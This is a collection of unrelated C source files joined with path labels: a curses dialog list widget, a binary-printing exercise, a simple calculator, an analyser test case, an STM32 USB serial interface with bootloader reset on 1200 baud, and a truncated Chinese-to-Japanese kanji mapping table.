DLG_KEYS_DATA( DLGK_FIELD_PREV, KEY_LEFT ), DLG_KEYS_DATA( DLGK_ITEM_FIRST, KEY_HOME ), DLG_KEYS_DATA( DLGK_ITEM_LAST, KEY_END ), DLG_KEYS_DATA( DLGK_ITEM_LAST, KEY_LL ), DLG_KEYS_DATA( DLGK_ITEM_NEXT, '+' ), DLG_KEYS_DATA( DLGK_ITEM_NEXT, KEY_DOWN ), DLG_KEYS_DATA( DLGK_ITEM_NEXT, CHR_NEXT ), DLG_KEYS_DATA( DLGK_ITEM_PREV, '-' ), DLG_KEYS_DATA( DLGK_ITEM_PREV, KEY_UP ), DLG_KEYS_DATA( DLGK_ITEM_PREV, CHR_PREVIOUS ), DLG_KEYS_DATA( DLGK_PAGE_NEXT, KEY_NPAGE ), DLG_KEYS_DATA( DLGK_PAGE_NEXT, DLGK_MOUSE(KEY_NPAGE) ), DLG_KEYS_DATA( DLGK_PAGE_NEXT, DLGK_MOUSE(KEY_NPAGE+KEY_MAX) ), DLG_KEYS_DATA( DLGK_PAGE_PREV, KEY_PPAGE ), DLG_KEYS_DATA( DLGK_PAGE_PREV, DLGK_MOUSE(KEY_PPAGE) ), DLG_KEYS_DATA( DLGK_PAGE_PREV, DLGK_MOUSE(KEY_PPAGE+KEY_MAX) ), DLG_KEYS_DATA( DLGK_GRID_LEFT, KEY_LEFTCOL ), DLG_KEYS_DATA( DLGK_GRID_RIGHT, KEY_RIGHTCOL ), END_KEYS_BINDING }; /* *INDENT-ON* */ #ifdef KEY_RESIZE int old_height = height; int old_width = width; #endif ALL_DATA all; MY_DATA *data = all.list; int i, j, k, key2, found, x, y, cur_x, cur_y; int key = 0, fkey; bool save_visit = dialog_state.visit_items; int button; int cur_item; int was_mouse; int name_width, text_width, full_width, list_width; int result = DLG_EXIT_UNKNOWN; int num_states; bool first = TRUE; WINDOW *dialog; char *prompt = dlg_strclone(cprompt); const char **buttons = dlg_ok_labels(); const char *widget_name = "buildlist"; (void) order_mode; /* * Unlike other uses of --visit-items, we have two windows to visit. */ if (dialog_state.visit_cols) dialog_state.visit_cols = 2; memset(&all, 0, sizeof(all)); all.items = items; all.item_no = item_no; if (dialog_vars.default_item != 0) { cur_item = dlg_default_listitem(items); } else { if ((cur_item = first_item(&all, 0)) < 0) cur_item = first_item(&all, 1); } button = (dialog_state.visit_items ? (items[cur_item].state ? sRIGHT : sLEFT) : dlg_default_button()); dlg_does_output(); dlg_tab_correct_str(prompt); #ifdef KEY_RESIZE retry: #endif all.use_height = list_height; all.use_width = (2 * (dlg_calc_list_width(item_no, items) + 4 + 2 * MARGIN) + 1); all.use_width = MAX(26, all.use_width); if (all.use_height == 0) { /* calculate height without items (4) */ dlg_auto_size(title, prompt, &height, &width, MIN_HIGH, all.use_width); dlg_calc_listh(&height, &all.use_height, item_no); } else { dlg_auto_size(title, prompt, &height, &width, MIN_HIGH + all.use_height, all.use_width); } dlg_button_layout(buttons, &width); dlg_print_size(height, width); dlg_ctl_size(height, width); /* we need at least two states */ if (states == 0 || strlen(states) < 2) states = " *"; num_states = (int) strlen(states); x = dlg_box_x_ordinate(width); y = dlg_box_y_ordinate(height); dialog = dlg_new_window(height, width, y, x); dlg_register_window(dialog, widget_name, binding); dlg_register_buttons(dialog, widget_name, buttons); dlg_mouse_setbase(all.base_x = x, all.base_y = y); dlg_draw_box2(dialog, 0, 0, height, width, dialog_attr, border_attr, border2_attr); dlg_draw_bottom_box2(dialog, border_attr, border2_attr, dialog_attr); dlg_draw_title(dialog, title); (void) wattrset(dialog, dialog_attr); dlg_print_autowrap(dialog, prompt, height, width); list_width = (width - 6 * MARGIN - 2) / 2; getyx(dialog, cur_y, cur_x); data[0].box_y = cur_y + 1; data[0].box_x = MARGIN + 1; data[1].box_y = cur_y + 1; data[1].box_x = data[0].box_x + 1 + 2 * MARGIN + list_width; /* * After displaying the prompt, we know how much space we really have. * Limit the list to avoid overwriting the ok-button. */ if (all.use_height + MIN_HIGH > height - cur_y) all.use_height = height - MIN_HIGH - cur_y; if (all.use_height <= 0) all.use_height = 1; for (k = 0; k < 2; ++k) { /* create new window for the list */ data[k].win = dlg_sub_window(dialog, all.use_height, list_width, y + data[k].box_y + 1, x + data[k].box_x + 1); /* draw a box around the list items */ dlg_draw_box(dialog, data[k].box_y, data[k].box_x, all.use_height + 2 * MARGIN, list_width + 2 * MARGIN, menubox_border_attr, menubox_border2_attr); } text_width = 0; name_width = 0; /* Find length of longest item to center buildlist */ for (i = 0; i < item_no; i++) { text_width = MAX(text_width, dlg_count_columns(items[i].text)); name_width = MAX(name_width, dlg_count_columns(items[i].name)); } /* If the name+text is wider than the list is allowed, then truncate * one or both of them. If the name is no wider than 1/4 of the list, * leave it intact. */ all.use_width = (list_width - 6 * MARGIN); if (dialog_vars.no_tags && !dialog_vars.no_items) { full_width = MIN(all.use_width, text_width); } else if (dialog_vars.no_items) { full_width = MIN(all.use_width, name_width); } else { if (text_width >= 0 && name_width >= 0 && all.use_width > 0 && text_width + name_width > all.use_width) { int need = (int) (0.25 * all.use_width); if (name_width > need) { int want = (int) (all.use_width * ((double) name_width) / (text_width + name_width)); name_width = (want > need) ? want : need; } text_width = all.use_width - name_width; } full_width = text_width + name_width; } all.check_x = (all.use_width - full_width) / 2; all.item_x = ((dialog_vars.no_tags ? 0 : (dialog_vars.no_items ? 0 : (name_width + 2))) + all.check_x); /* ensure we are scrolled to show the current choice */ j = MIN(all.use_height, item_no); for (i = 0; i < 2; ++i) { int top_item = 0; if ((items[cur_item].state != 0) == i) { top_item = cur_item - j + 1; if (top_item < 0) top_item = 0; set_top_item(&all, top_item, i); } else { set_top_item(&all, 0, i); } } /* register the new window, along with its borders */ for (i = 0; i < 2; ++i) { dlg_mouse_mkbigregion(data[i].box_y + 1, data[i].box_x, all.use_height, list_width + 2, 2 * KEY_MAX + (i * (1 + all.use_height)), 1, 1, 1 /* by lines */ ); } dlg_draw_buttons(dialog, height - 2, 0, buttons, button, FALSE, width); while (result == DLG_EXIT_UNKNOWN) { int which = (items[cur_item].state != 0); MY_DATA *moi = data + which; int at_top = index2row(&all, moi->top_index, which); int at_end = index2row(&all, -1, which); int at_bot = skip_rows(&all, at_top, all.use_height, which); dlg_trace_msg("\t** state %d:%d top %d (%d:%d:%d) %d\n", cur_item, item_no - 1, moi->top_index, at_top, at_bot, at_end, which); if (first) { print_both(&all, cur_item); dlg_trace_win(dialog); first = FALSE; } if (button < 0) { /* --visit-items */ int cur_row = index2row(&all, cur_item, which); cur_y = (data[which].box_y + cur_row + 1); if (at_top > 0) cur_y -= at_top; cur_x = (data[which].box_x + all.check_x + 1); dlg_trace_msg("\t...visit row %d (%d,%d)\n", cur_row, cur_y, cur_x); wmove(dialog, cur_y, cur_x); } key = dlg_mouse_wgetch(dialog, &fkey); if (dlg_result_key(key, fkey, &result)) break; was_mouse = (fkey && is_DLGK_MOUSE(key)); if (was_mouse) key -= M_EVENT; if (!was_mouse) { ; } else if (key >= 2 * KEY_MAX) { i = (key - 2 * KEY_MAX) % (1 + all.use_height); j = (key - 2 * KEY_MAX) / (1 + all.use_height); k = row2index(&all, i + at_top, j); dlg_trace_msg("MOUSE column %d, row %d ->item %d\n", j, i, k); if (k >= 0 && j < 2) { if (j != which) { /* * Mouse click was in the other column. */ moi = data + j; fix_top_item(&all, k, j); } which = j; at_top = index2row(&all, moi->top_index, which); at_bot = skip_rows(&all, at_top, all.use_height, which); cur_item = k; print_both(&all, cur_item); key = KEY_TOGGLE; /* force the selected item to toggle */ } else { beep(); continue; } fkey = FALSE; } else if (key >= KEY_MIN) { if (key > KEY_MAX) { if (which == 0) { key = KEY_RIGHTCOL; /* switch to right-column */ fkey = FALSE; } else { key -= KEY_MAX; } } else { if (which == 1) { key = KEY_LEFTCOL; /* switch to left-column */ fkey = FALSE; } } key = dlg_lookup_key(dialog, key, &fkey); } /* * A space toggles the item status. Normally we put the cursor on * the next available item in the same column. But if there are no * more items in the column, move the cursor to the other column. */ if (key == KEY_TOGGLE) { int new_choice; int new_state = items[cur_item].state + 1; if ((new_choice = next_item(&all, cur_item, which)) == cur_item) { new_choice = prev_item(&all, cur_item, which); } dlg_trace_msg("cur_item %d, new_choice:%d\n", cur_item, new_choice); if (new_state >= num_states) new_state = 0; items[cur_item].state = new_state; if (cur_item == moi->top_index) { set_top_item(&all, new_choice, which); } if (new_choice >= 0) { fix_top_item(&all, cur_item, !which); cur_item = new_choice; } print_both(&all, cur_item); dlg_trace_win(dialog); continue; /* wait for another key press */ } /* * Check if key pressed matches first character of any item tag in * list. If there is more than one match, we will cycle through * each one as the same key is pressed repeatedly. */ found = FALSE; if (!fkey) { if (button < 0 || !dialog_state.visit_items) { for (j = cur_item + 1; j < item_no; j++) { if (check_hotkey(items, j, which)) { found = TRUE; i = j; break; } } if (!found) { for (j = 0; j <= cur_item; j++) { if (check_hotkey(items, j, which)) { found = TRUE; i = j; break; } } } if (found) dlg_flush_getc(); } else if ((j = dlg_char_to_button(key, buttons)) >= 0) { button = j; ungetch('\n'); continue; } } /* * A single digit (1-9) positions the selection to that line in the * current screen. */ if (!found && (key <= '9') && (key > '0') && (key - '1' < at_bot)) { found = TRUE; i = key - '1'; } if (!found && fkey) { switch (key) { case DLGK_FIELD_PREV: if ((button == sRIGHT) && dialog_state.visit_items) { key = DLGK_GRID_LEFT; button = sLEFT; } else { button = dlg_prev_button(buttons, button); dlg_draw_buttons(dialog, height - 2, 0, buttons, button, FALSE, width); if (button == sRIGHT) { key = DLGK_GRID_RIGHT; } else { continue; } } break; case DLGK_FIELD_NEXT: if ((button == sLEFT) && dialog_state.visit_items) { key = DLGK_GRID_RIGHT; button = sRIGHT; } else { button = dlg_next_button(buttons, button); dlg_draw_buttons(dialog, height - 2, 0, buttons, button, FALSE, width); if (button == sLEFT) { key = DLGK_GRID_LEFT; } else { continue; } } break; } } if (!found && fkey) { i = cur_item; found = TRUE; switch (key) { case DLGK_GRID_LEFT: i = closest_item(&all, cur_item, 0); fix_top_item(&all, i, 0); break; case DLGK_GRID_RIGHT: i = closest_item(&all, cur_item, 1); fix_top_item(&all, i, 1); break; case DLGK_PAGE_PREV: if (cur_item > moi->top_index) { i = moi->top_index; } else if (moi->top_index != 0) { int temp = at_top; if ((temp -= all.use_height) < 0) temp = 0; i = row2index(&all, temp, which); } break; case DLGK_PAGE_NEXT: if ((at_end - at_bot) < all.use_height) { i = next_item(&all, row2index(&all, at_end, which), which); } else { i = next_item(&all, row2index(&all, at_bot, which), which); at_top = at_bot; set_top_item(&all, next_item(&all, row2index(&all, at_top, which), which), which); at_bot = skip_rows(&all, at_top, all.use_height, which); at_bot = MIN(at_bot, at_end); } break; case DLGK_ITEM_FIRST: i = first_item(&all, which); break; case DLGK_ITEM_LAST: i = last_item(&all, which); break; case DLGK_ITEM_PREV: i = prev_item(&all, cur_item, which); if (stop_prev(&all, cur_item, which)) continue; break; case DLGK_ITEM_NEXT: i = next_item(&all, cur_item, which); break; default: found = FALSE; break; } } if (found) { if (i != cur_item) { int now_at = index2row(&all, i, which); int oops = item_no; int old_item; dlg_trace_msg("<--CHOICE %d\n", i); dlg_trace_msg("<--topITM %d\n", moi->top_index); dlg_trace_msg("<--now_at %d\n", now_at); dlg_trace_msg("<--at_top %d\n", at_top); dlg_trace_msg("<--at_bot %d\n", at_bot); if (now_at >= at_bot) { while (now_at >= at_bot) { if ((at_bot - at_top) >= all.use_height) { set_top_item(&all, next_item(&all, moi->top_index, which), which); } at_top = index2row(&all, moi->top_index, which); at_bot = skip_rows(&all, at_top, all.use_height, which); dlg_trace_msg("...at_bot %d (now %d vs %d)\n", at_bot, now_at, at_end); dlg_trace_msg("...topITM %d\n", moi->top_index); dlg_trace_msg("...at_top %d (diff %d)\n", at_top, at_bot - at_top); if (at_bot >= at_end) { /* * If we bumped into the end, move the top-item * down by one line so that we can display the * last item in the list. */ if ((at_bot - at_top) > all.use_height) { set_top_item(&all, next_item(&all, moi->top_index, which), which); } else if (at_top > 0 && (at_bot - at_top) >= all.use_height) { set_top_item(&all, next_item(&all, moi->top_index, which), which); } break; } if (--oops < 0) { dlg_trace_msg("OOPS-forward\n"); break; } } } else if (now_at < at_top) { while (now_at < at_top) { old_item = moi->top_index; set_top_item(&all, prev_item(&all, moi->top_index, which), which); at_top = index2row(&all, moi->top_index, which); dlg_trace_msg("...at_top %d (now %d)\n", at_top, now_at); dlg_trace_msg("...topITM %d\n", moi->top_index); if (moi->top_index >= old_item) break; if (at_top <= now_at) break; if (--oops < 0) { dlg_trace_msg("OOPS-backward\n"); break; } } } dlg_trace_msg("-->now_at %d\n", now_at); cur_item = i; print_both(&all, cur_item); } dlg_trace_win(dialog); continue; /* wait for another key press */ } if (fkey) { switch (key) { case DLGK_ENTER: result = dlg_enter_buttoncode(button); break; #ifdef KEY_RESIZE case KEY_RESIZE: /* reset data */ height = old_height; width = old_width; /* repaint */ dlg_clear(); dlg_del_window(dialog); refresh(); dlg_mouse_free_regions(); goto retry; #endif default: if (was_mouse) { if ((key2 = dlg_ok_buttoncode(key)) >= 0) { result = key2; break; } beep(); } } } else { beep(); } } dialog_state.visit_cols = save_visit; dlg_del_window(dialog); dlg_mouse_free_regions(); free(prompt); *current_item = cur_item; return result; } /* * Display a dialog box with a list of options that can be turned on or off */ int dialog_buildlist(const char *title, const char *cprompt, int height, int width, int list_height, int item_no, char **items, int order_mode) { int result; int i, j; DIALOG_LISTITEM *listitems; bool separate_output = dialog_vars.separate_output; bool show_status = FALSE; int current = 0; char *help_result; listitems = dlg_calloc(DIALOG_LISTITEM, (size_t) item_no + 1); assert_ptr(listitems, "dialog_buildlist"); for (i = j = 0; i < item_no; ++i) { listitems[i].name = items[j++]; listitems[i].text = (dialog_vars.no_items ? dlg_strempty() : items[j++]); listitems[i].state = !dlg_strcmp(items[j++], "on"); listitems[i].help = ((dialog_vars.item_help) ? items[j++] : dlg_strempty()); } dlg_align_columns(&listitems[0].text, (int) sizeof(DIALOG_LISTITEM), item_no); result = dlg_buildlist(title, cprompt, height, width, list_height, item_no, listitems, NULL, order_mode, &current); switch (result) { case DLG_EXIT_OK: /* FALLTHRU */ case DLG_EXIT_EXTRA: show_status = TRUE; break; case DLG_EXIT_HELP: dlg_add_help_listitem(&result, &help_result, &listitems[current]); if ((show_status = dialog_vars.help_status)) { if (separate_output) { dlg_add_string(help_result); dlg_add_separator(); } else { dlg_add_quoted(help_result); } } else { dlg_add_string(help_result); } break; } if (show_status) { for (i = 0; i < item_no; i++) { if (listitems[i].state) { if (separate_output) { dlg_add_string(listitems[i].name); dlg_add_separator(); } else { if (dlg_need_separator()) dlg_add_separator(); dlg_add_quoted(listitems[i].name); } } } dlg_add_last_key(-1); } dlg_free_columns(&listitems[0].text, (int) sizeof(DIALOG_LISTITEM), item_no); free(listitems); return result; }
the_stack_data/68887802.c
// Pentru valori întregi citite de la tastatură // să se tiparească valoarea corespunzătoare în binar. #include <stdio.h> #include <stdlib.h> void convert10to2_1(int number) { for (int i = 8 * sizeof(number) - 1 ; i >= 0 ; i--) { int x = 1 << i; // mask if ((number & x) != 0) { printf("1"); } else { printf("0"); } } printf("\n"); } void convert10to2_2(int number) { for (int i = 8 * sizeof(number) - 1 ; i >= 0 ; i--) { printf("%d", ((number & (1 << i)) != 0) ? 1 : 0); } printf("\n"); } void convert10to2_3(int number) { // 10 - 00000...0001010 char bits[8 * sizeof(number)]; int cnt = 0; while(number) { bits[cnt] = number & 1; cnt++; number >>= 1; } for (int i = cnt - 1 ; i >= 0 ; i--) { printf("%d", bits[i]); } printf("\n"); } int main() { int n = 10; convert10to2_1(n); convert10to2_2(n); convert10to2_3(n); printf("Ne-a iesit exercitiul\n"); return 0; }
the_stack_data/140766746.c
#include <stdio.h> #include <stdlib.h> #include <math.h> #define QL printf("\n") main(){ float num1, num2; char c, op; do{ printf("\nDigite: numero OP numero\n"); scanf("%f %c %f", &num1, &op, &num2); switch(op) { case'+':{ printf("=%g\n", num1+num2); printf("\nA operacao foi de adicao\n"); }break; case'-': printf("=%g\n", num1-num2); break; case'*': printf("=%g\n", num1*num2); break; case'/': printf("=%g\n", num1/num2); break; case'^': printf("=%g\n", pow(num1,num2)); break; default: printf("Operador Invalido\n"); break; } QL; printf("Continua(S/N)?"); scanf(" %c", &c); }while((c == 'S')||(c == 's')); QL; system("pause"); }
the_stack_data/87638121.c
int z; int pureFun(void) { return 3; } int imPureFun(void) { z++; return 4; } int strcmp(char *x, char *y); int unknownFun(char *x, char *y); void f(int x, int y) { if (x && y) x++; if (x && y++) x++; if (x && pureFun()) x++; if (x && imPureFun()) x++; if (x && strcmp("foo", "bar")) x++; if (x && unknownFun("foo", "bar")) x++; }
the_stack_data/97011581.c
/** ****************************************************************************** * @file usbd_cdc_if.c * @author MCD Application Team * @brief Generic media access Layer. ****************************************************************************** * @attention * * <h2><center>&copy; Copyright (c) 2015 STMicroelectronics. * All rights reserved.</center></h2> * * This software component is licensed by ST under Ultimate Liberty license * SLA0044, the "License"; You may not use this file except in compliance with * the License. You may obtain a copy of the License at: * www.st.com/SLA0044 * ****************************************************************************** */ #ifdef USBCON #ifdef USBD_USE_CDC /* Includes ------------------------------------------------------------------*/ #include "usbd_desc.h" #include "usbd_cdc_if.h" #include "bootloader.h" #ifdef USE_USB_HS #define CDC_MAX_PACKET_SIZE USB_OTG_HS_MAX_PACKET_SIZE #elif defined(USB_OTG_FS) || defined(USB_OTG_FS_MAX_PACKET_SIZE) #define CDC_MAX_PACKET_SIZE USB_OTG_FS_MAX_PACKET_SIZE #else /* USB */ #define CDC_MAX_PACKET_SIZE USB_MAX_EP0_SIZE #endif /* * The value USB_CDC_TRANSMIT_TIMEOUT is defined in terms of HAL_GetTick() units. * Typically it is 1ms value. The timeout determines when we would consider the * host "too slow" and threat the USB CDC port as disconnected. */ #ifndef USB_CDC_TRANSMIT_TIMEOUT #define USB_CDC_TRANSMIT_TIMEOUT 3 #endif /* USBD_CDC Private Variables */ /* USB Device Core CDC handle declaration */ USBD_HandleTypeDef hUSBD_Device_CDC; static bool CDC_initialized = false; //--------------------------------- volatile uint8_t dfu_request = 0; /* For a bug in some Linux 64 bit PC we need to delay the reset of the CPU of 500ms seconds */ int counter_dfu_reset = 500; /* the unit is equal to CDC_POLLING_INTERVAL that is 1ms by default */ //-------------------------------- /* Received Data over USB are stored in this buffer */ CDC_TransmitQueue_TypeDef TransmitQueue; CDC_ReceiveQueue_TypeDef ReceiveQueue; __IO uint32_t lineState = 0; __IO bool receivePended = true; static uint32_t transmitStart = 0; #ifdef DTR_TOGGLING_SEQ /* DTR toggling sequence management */ extern void dtr_togglingHook(uint8_t *buf, uint32_t *len); uint8_t dtr_toggling = 0; #endif /** USBD_CDC Private Function Prototypes */ static int8_t USBD_CDC_Init(void); static int8_t USBD_CDC_DeInit(void); static int8_t USBD_CDC_Control(uint8_t cmd, uint8_t *pbuf, uint16_t length); static int8_t USBD_CDC_Receive(uint8_t *pbuf, uint32_t *Len); static int8_t USBD_CDC_TransmitCplt(uint8_t *pbuf, uint32_t *Len, uint8_t epnum); USBD_CDC_ItfTypeDef USBD_CDC_fops = { USBD_CDC_Init, USBD_CDC_DeInit, USBD_CDC_Control, USBD_CDC_Receive, USBD_CDC_TransmitCplt }; USBD_CDC_LineCodingTypeDef linecoding = { 115200, /* baud rate*/ 0x00, /* stop bits-1*/ 0x00, /* parity - none*/ 0x08 /* nb. of bits 8*/ }; /* Private functions ---------------------------------------------------------*/ /** * @brief USBD_CDC_Init * Initializes the CDC media low layer * @param None * @retval Result of the operation: USBD_OK if all operations are OK else USBD_FAIL */ static int8_t USBD_CDC_Init(void) { /* Set Application Buffers */ CDC_TransmitQueue_Init(&TransmitQueue); CDC_ReceiveQueue_Init(&ReceiveQueue); receivePended = true; USBD_CDC_SetRxBuffer(&hUSBD_Device_CDC, CDC_ReceiveQueue_ReserveBlock(&ReceiveQueue)); return ((int8_t)USBD_OK); } /** * @brief USBD_CDC_DeInit * DeInitializes the CDC media low layer * @param None * @retval Result of the operation: USBD_OK if all operations are OK else USBD_FAIL */ static int8_t USBD_CDC_DeInit(void) { return ((int8_t)USBD_OK); } /** * @brief USBD_CDC_Control * Manage the CDC class requests * @param cmd: Command code * @param pbuf: Buffer containing command data (request parameters) * @param length: Number of data to be sent (in bytes) * @retval Result of the operation: USBD_OK if all operations are OK else USBD_FAIL */ static int8_t USBD_CDC_Control(uint8_t cmd, uint8_t *pbuf, uint16_t length) { UNUSED(length); switch (cmd) { case CDC_SEND_ENCAPSULATED_COMMAND: break; case CDC_GET_ENCAPSULATED_RESPONSE: break; case CDC_SET_COMM_FEATURE: break; case CDC_GET_COMM_FEATURE: break; case CDC_CLEAR_COMM_FEATURE: break; /*******************************************************************************/ /* Line Coding Structure */ /*-----------------------------------------------------------------------------*/ /* Offset | Field | Size | Value | Description */ /* 0 | dwDTERate | 4 | Number |Data terminal rate, in bits per second*/ /* 4 | bCharFormat | 1 | Number | Stop bits */ /* 0 - 1 Stop bit */ /* 1 - 1.5 Stop bits */ /* 2 - 2 Stop bits */ /* 5 | bParityType | 1 | Number | Parity */ /* 0 - None */ /* 1 - Odd */ /* 2 - Even */ /* 3 - Mark */ /* 4 - Space */ /* 6 | bDataBits | 1 | Number Data bits (5, 6, 7, 8 or 16). */ /*******************************************************************************/ case CDC_SET_LINE_CODING: linecoding.bitrate = (uint32_t)(pbuf[0] | (pbuf[1] << 8) | \ (pbuf[2] << 16) | (pbuf[3] << 24)); if(linecoding.bitrate == 1200){ //if port is opened at 1200 baud set dfu_request dfu_request = 1; *((unsigned long *)0x20003FF0) = 0x0D15EA5E;//set the magic Word NVIC_SystemReset();//Reset to jump } if(linecoding.bitrate == 300){ //if port is opened at 1200 baud set dfu_request NVIC_SystemReset();//Reset MCU } linecoding.format = pbuf[4]; linecoding.paritytype = pbuf[5]; linecoding.datatype = pbuf[6]; break; case CDC_GET_LINE_CODING: pbuf[0] = (uint8_t)(linecoding.bitrate); pbuf[1] = (uint8_t)(linecoding.bitrate >> 8); pbuf[2] = (uint8_t)(linecoding.bitrate >> 16); pbuf[3] = (uint8_t)(linecoding.bitrate >> 24); pbuf[4] = linecoding.format; pbuf[5] = linecoding.paritytype; pbuf[6] = linecoding.datatype; break; case CDC_SET_CONTROL_LINE_STATE: lineState = (((USBD_SetupReqTypedef *)pbuf)->wValue & 0x01) != 0; // Check DTR state if (lineState) { // Reset the transmit timeout when the port is connected transmitStart = 0; } #ifdef DTR_TOGGLING_SEQ dtr_toggling++; /* Count DTR toggling */ #endif break; case CDC_SEND_BREAK: break; default: break; } return ((int8_t)USBD_OK); } /** * @brief USBD_CDC_Receive * Data received over USB OUT endpoint are sent over CDC interface * through this function. * * @note * This function will issue a NAK packet on any OUT packet received on * USB endpoint until exiting this function. If you exit this function * before transfer is complete on CDC interface (ie. using DMA controller) * it will result in receiving more data while previous ones are still * not sent. * * @param Buf: Buffer of data to be received * @param Len: Number of data received (in bytes) * @retval Result of the operation: USBD_OK if all operations are OK else USBD_FAIL */ static int8_t USBD_CDC_Receive(uint8_t *Buf, uint32_t *Len) { #ifdef DTR_TOGGLING_SEQ if (dtr_toggling > 3) { dtr_togglingHook(Buf, Len); dtr_toggling = 0; } #else UNUSED(Buf); #endif /* It always contains required amount of free space for writing */ CDC_ReceiveQueue_CommitBlock(&ReceiveQueue, (uint16_t)(*Len)); receivePended = false; /* If enough space in the queue for a full buffer then continue receive */ if (!CDC_resume_receive()) { USBD_CDC_ClearBuffer(&hUSBD_Device_CDC); } return ((int8_t)USBD_OK); } /** * @brief USBD_CDC_TransmitCplt * Data transmited callback * * @note * This function is IN transfer complete callback used to inform user that * the submitted Data is successfully sent over USB. * * @param Buf: Buffer of data to be received * @param Len: Number of data received (in bytes) * @retval Result of the operation: USBD_OK if all operations are OK else USBD_FAIL */ static int8_t USBD_CDC_TransmitCplt(uint8_t *Buf, uint32_t *Len, uint8_t epnum) { UNUSED(Buf); UNUSED(Len); UNUSED(epnum); transmitStart = 0; CDC_TransmitQueue_CommitRead(&TransmitQueue); CDC_continue_transmit(); return ((int8_t)USBD_OK); } void CDC_init(void) { if (!CDC_initialized) { /* Init Device Library */ if (USBD_Init(&hUSBD_Device_CDC, &USBD_Desc, 0) == USBD_OK) { /* Add Supported Class */ if (USBD_RegisterClass(&hUSBD_Device_CDC, USBD_CDC_CLASS) == USBD_OK) { /* Add CDC Interface Class */ if (USBD_CDC_RegisterInterface(&hUSBD_Device_CDC, &USBD_CDC_fops) == USBD_OK) { /* Start Device Process */ USBD_Start(&hUSBD_Device_CDC); CDC_initialized = true; } } } } } void CDC_deInit(void) { if (CDC_initialized) { USBD_Stop(&hUSBD_Device_CDC); USBD_CDC_DeInit(); USBD_DeInit(&hUSBD_Device_CDC); CDC_initialized = false; } } bool CDC_connected() { /* Save the transmitStart value in a local variable to avoid twice reading - fix #478 */ uint32_t transmitTime = transmitStart; if (transmitTime) { transmitTime = HAL_GetTick() - transmitTime; } return ((hUSBD_Device_CDC.dev_state == USBD_STATE_CONFIGURED) && (transmitTime < USB_CDC_TRANSMIT_TIMEOUT) && lineState); } void CDC_continue_transmit(void) { uint16_t size; uint8_t *buffer; USBD_CDC_HandleTypeDef *hcdc = (USBD_CDC_HandleTypeDef *) hUSBD_Device_CDC.pClassData; /* * TS: This method can be called both in the main thread * (via USBSerial::write) and in the IRQ stream (via USBD_CDC_TransmistCplt), * BUT the main thread cannot pass this condition while waiting for a IRQ! * This is not possible because TxState is not zero while waiting for data * transfer ending! The IRQ thread is uninterrupted, since its priority * is higher than that of the main thread. So this method is thread safe. */ if (hcdc->TxState == 0U) { buffer = CDC_TransmitQueue_ReadBlock(&TransmitQueue, &size); if (size > 0) { transmitStart = HAL_GetTick(); USBD_CDC_SetTxBuffer(&hUSBD_Device_CDC, buffer, size); /* * size never exceed PMA buffer and USBD_CDC_TransmitPacket make full * copy of block in PMA, so no need to worry about buffer damage */ USBD_CDC_TransmitPacket(&hUSBD_Device_CDC); } } } bool CDC_resume_receive(void) { /* * TS: main and IRQ threads can't pass it at same time, because * IRQ may occur only if receivePended is true. So it is thread-safe! */ if (!receivePended) { uint8_t *block = CDC_ReceiveQueue_ReserveBlock(&ReceiveQueue); if (block != NULL) { receivePended = true; /* Set new buffer */ USBD_CDC_SetRxBuffer(&hUSBD_Device_CDC, block); USBD_CDC_ReceivePacket(&hUSBD_Device_CDC); return true; } } return false; } #endif /* USBD_USE_CDC */ #endif /* USBCON */ /************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
the_stack_data/6387351.c
#include <stdlib.h> const size_t ZhTwToJpKanjiTableSize = 363*2; unsigned short ZhTwToJpKanjiTable[363*2]={ 20056, 20055, 20098, 20081, 20113, 20253, 20126, 20124, 20315, 20175, 20358, 26469, 20540, 20516, 20491, 31623, 20551, 20206, 20570, 20316, 20659, 20253, 20721, 38599, 20729, 20385, 20745, 20537, 20807, 20982, 20818, 20816, 20839, 20869, 20841, 20001, 20912, 27703, 20960, 26426, 21067, 20811, 21097, 21104, 21123, 30011, 21133, 21091, 21137, 21092, 21214, 21172, 21211, 21234, 21237, 21169, 21240, 21223, 21312, 21306, 21367, 24059, 21371, 21364, 21443, 21442, 21467, 21453, 21555, 21577, 21934, 21336, 22196, 21427, 22225, 22065, 22280, 22287, 22283, 22269, 22285, 22258, 22291, 20870, 22296, 22243, 22294, 22259, 22686, 22679, 22702, 22549, 22739, 22311, 22744, 22593, 22750, 22730, 22756, 22732, 22767, 22766, 22777, 22769, 22781, 23551, 22887, 22885, 22941, 31911, 22986, 22985, 23064, 23330, 23067, 23087, 23020, 23019, 23416, 23398, 23526, 23455, 23522, 23517, 23532, 23515, 23531, 20889, 23542, 23453, 23560, 23554, 23559, 23558, 23565, 23550, 23622, 23626, 23660, 23646, 23805, 23777, 23997, 23731, 24034, 24035, 24118, 24111, 24290, 24259, 24291, 24195, 24307, 24193, 24392, 24382, 24465, 24452, 24478, 24467, 24492, 20621, 24503, 24499, 24501, 24500, 24646, 24658, 24709, 24742, 24801, 24746, 24800, 24693, 24817, 24745, 24920, 24808, 24958, 27442, 25033, 24540, 25079, 25040, 25088, 24651, 25136, 25126, 25138, 25135, 25142, 25144, 25150, 25147, 25176, 35351, 25282, 25173, 25300, 25244, 25308, 25309, 25406, 25375, 25458, 24059, 25554, 25407, 25581, 25522, 25628, 25436, 25622, 25594, 25765, 30330, 25818, 25312, 25799, 25246, 25812, 25285, 25802, 25731, 25844, 25313, 25885, 25666, 25884, 25658, 25910, 21454, 25928, 21177, 21855, 21843, 25944, 21465, 25976, 25968, 26039, 26029, 26205, 26172, 26202, 26217, 26310, 26278, 26313, 26241, 26371, 20250, 26524, 33747, 26480, 20625, 26597, 26619, 26700, 21331, 26781, 26465, 26855, 26719, 26827, 30849, 27054, 26628, 27171, 27096, 27166, 26530, 27155, 27004, 27138, 27005, 27243, 27178, 27298, 26908, 27387, 26716, 27402, 27177, 27472, 27431, 27489, 27475, 27493, 27497, 27506, 27507, 27511, 27508, 27512, 24112, 27519, 27809, 27544, 27531, 27580, 27579, 27590, 27572, 27599, 27598, 27603, 32946, 27675, 38640, 27683, 27671, 27737, 27738, 27785, 27784, 27794, 27809, 28041, 28169, 28154, 27973, 28122, 28057, 28136, 27972, 28212, 28167, 28348, 28287, 28331, 28201, 28330, 28179, 28415, 28288, 28399, 28382, 28497, 30330, 28507, 28508, 28580, 27810, 28657, 27996, 28639, 28168, 28544, 28171, 28712, 28716, 28771, 28286, 29076, 28342, 29138, 28988, 29128, 28783, 29151, 21942, 29200, 28809, 29229, 20105, 29351, 29344, 29376, 29366, 29433, 29421, 29518, 22888, 29544, 29420, 29557, 29471, 29560, 29539, 29563, 